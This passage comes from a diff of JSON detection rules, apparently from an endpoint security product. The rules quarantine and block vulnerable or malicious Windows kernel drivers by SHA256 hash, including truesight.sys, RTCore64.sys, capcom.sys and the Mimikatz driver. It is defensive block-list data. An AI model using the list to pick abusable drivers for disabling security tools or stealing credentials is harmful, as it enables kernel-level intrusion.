"eabb8103cdc97c7cdfaf60424922d10f0c8ed93aa2445d744c7bbf818bf42abd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9718d72e-b3f6-5725-9047-ecb60d7db4ed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821102Z", + "creation_date": "2026-03-23T11:45:31.821106Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821114Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a5e58c8d462a64fd87ba105e322ffe187ee3f579b9a4f2d3979a0591e26c7289", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9719fff2-1fb3-5a27-89d3-390ab652d22f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145053Z", + "creation_date": "2026-03-23T11:45:31.145055Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145061Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9d81c5fd006b5426dfac0775df41310d4baa7e5658b5dd98c211bb262f162bc0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "971b627c-1aba-5d37-8b5b-971d50ea6320", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490609Z", + "creation_date": "2026-03-23T11:45:31.490611Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490616Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b234b96dc4c064eb7cb9a2c742b271519d61eb957c32d2fc8772238f826286eb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9722e225-3c41-52c6-8ea3-5e7e757adea1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968809Z", + "creation_date": "2026-03-23T11:45:29.968811Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968817Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0cd4ca335155062182608cad9ef5c8351a715bce92049719dd09c76422cd7b0c", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "972ff264-e540-5887-b3d2-d53553996af0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477200Z", + "creation_date": 
"2026-03-23T11:45:30.477203Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477213Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fed0fe2489ae807913be33827b3b11359652a127e33b64464cc570c05abd0d17", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9733fd1c-53c1-5cf8-836d-d2a760efe781", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454327Z", + "creation_date": "2026-03-23T11:45:30.454330Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454339Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56", + "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "97381357-272b-501c-8d30-3b07a543cb25", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830034Z", + "creation_date": "2026-03-23T11:45:31.830036Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830041Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dffb52619e11ec118a68f4aeebec49a78908de6348ae4db5eed4625028383d34", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9750936e-32e0-5a2b-bad9-30f38d4b73b7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810468Z", + "creation_date": "2026-03-23T11:45:31.810470Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810475Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0aaa8a63ee22354585282a5aa02148c69931fc569fb059f2caf7cbeab5a81ab2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "97646d4c-e763-5a56-8e49-575609477267", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482696Z", + "creation_date": "2026-03-23T11:45:31.482699Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482709Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "60f11064c0db8906831f716c191a602abd44dbb96f07d2a1cda6a973ff2935b8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "977058a3-53ac-5252-a5d7-96237d07dc8a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492126Z", + "creation_date": "2026-03-23T11:45:31.492128Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492133Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "61fbeaf94ab0cdbfb6f3ea518929651e83e6fdddc470989aaaa3177ca19350dc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9776d780-c455-505e-8c80-beedeca2cd74", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971125Z", + "creation_date": "2026-03-23T11:45:29.971128Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971135Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"00bef60f6b7813aec6733107144dc92f374cea63a7b612f788423bb34f8aabf8", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9776f54a-49ad-5906-8d42-636b19cd8484", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830186Z", + "creation_date": "2026-03-23T11:45:30.830188Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830194Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "50e5753471ed74c3bba67d5d959cb7a6f820a93633012c756ed40ebccc44d051", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "97770fd2-96b3-523c-8c57-3be696d76f53", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818983Z", + "creation_date": "2026-03-23T11:45:30.818985Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818990Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1126c9b043872383e5e0b1ac893ddf2238a2c130401627b259c81d98a3cefeae", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "97799ae9-e443-592a-85a8-35879126da4d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481256Z", + "creation_date": "2026-03-23T11:45:30.481258Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481264Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c0a63e8a6a335f2498794f44cf5629453075f31db314eaecbd964cf615de3f7", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "977cbb47-7a5b-582c-8b85-c282895516ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826508Z", + "creation_date": "2026-03-23T11:45:31.826510Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826515Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "00526be468c68c919a32b110c1faaa50f8ee1646a11ca856a8b6730e5505deba", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "977d5e3d-c3f3-51f6-8c89-da0e14e2efda", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985356Z", + "creation_date": "2026-03-23T11:45:29.985358Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985364Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6cb51ae871fbd5d07c5aad6ff8eea43d34063089528603ca9ceb8b4f52f68ddc", + "comment": "Dangerous Physmem Kernel Driver (aka Se64a.Sys) [https://www.loldrivers.io/drivers/d819bee2-3bff-481f-a301-acc3d1f5fe58/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "977e93ad-d41f-5c89-8e10-3bf19c3b7ac0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454477Z", + "creation_date": "2026-03-23T11:45:30.454481Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454490Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "be690e8bbc4b0ba4b37c1a331294655dff0c73be530428a447e318c06ec06d57", + "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "978ebec5-d845-5453-a651-b8fe1c149f0d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460236Z", + "creation_date": "2026-03-23T11:45:30.460239Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460248Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d3eaf041ce5f3fd59885ead2cb4ce5c61ac9d83d41f626512942a50e3da7b75a", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "97955461-896c-576a-bf7e-ba061f6c9493", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817339Z", + "creation_date": "2026-03-23T11:45:31.817341Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817346Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0df5c9f9fd26de96f6b3d09ddc481921ba209dfcc2bcec2a9e39b7c28b802d16", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "979d1fd2-26c7-53d2-b691-4597d0ac7f8e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479845Z", + "creation_date": "2026-03-23T11:45:30.479847Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479853Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a11b4f125d8537e69af7b684494e49ef2a30a219634988e278177fa36c934eb", + "comment": "Vulnerable Kernel Driver (aka capcom.sys) [https://www.loldrivers.io/drivers/b51c441a-12c7-407d-9517-559cc0030cf6/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "97a5cb28-a177-5e1e-9c67-8ebb2c70bd31", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.979308Z", + "creation_date": "2026-03-23T11:45:29.979310Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979315Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "139f8412a7c6fdc43dcfbbcdba256ee55654eb36a40f338249d5162a1f69b988", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "97a9b11b-fec6-5bfe-a073-41cba37855a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981607Z", + "creation_date": "2026-03-23T11:45:29.981609Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981614Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cf16a2218fc8a3b6fa5aa4a0bc6205792798078c380ccc7e5041476e0f1bc53d", + "comment": "Vulnerable Kernel Driver (aka netflt.sys) [https://www.loldrivers.io/drivers/35a9afeb-18f1-4c02-a3aa-830e300138ae/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "97d5651e-65da-5d02-9384-02f33d63639e", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821539Z", + "creation_date": "2026-03-23T11:45:31.821541Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821546Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5404f100c0171f3485183a38770a5c37d0393aa25ce0d5a4fbb52111ecb765e0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "97deb0e1-f465-5e36-a73e-a01d6517cfb6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155736Z", + "creation_date": "2026-03-23T11:45:31.155738Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.155743Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e95506050b5df4ccfc2b5a109022ade66604dc5dd306c7975b2e66d3888f70a5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "97ebd72e-eb90-5295-ba77-fc1e62a124a7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609771Z", + "creation_date": "2026-03-23T11:45:29.609773Z", + "enabled": true, + "block_on_agent": true, + 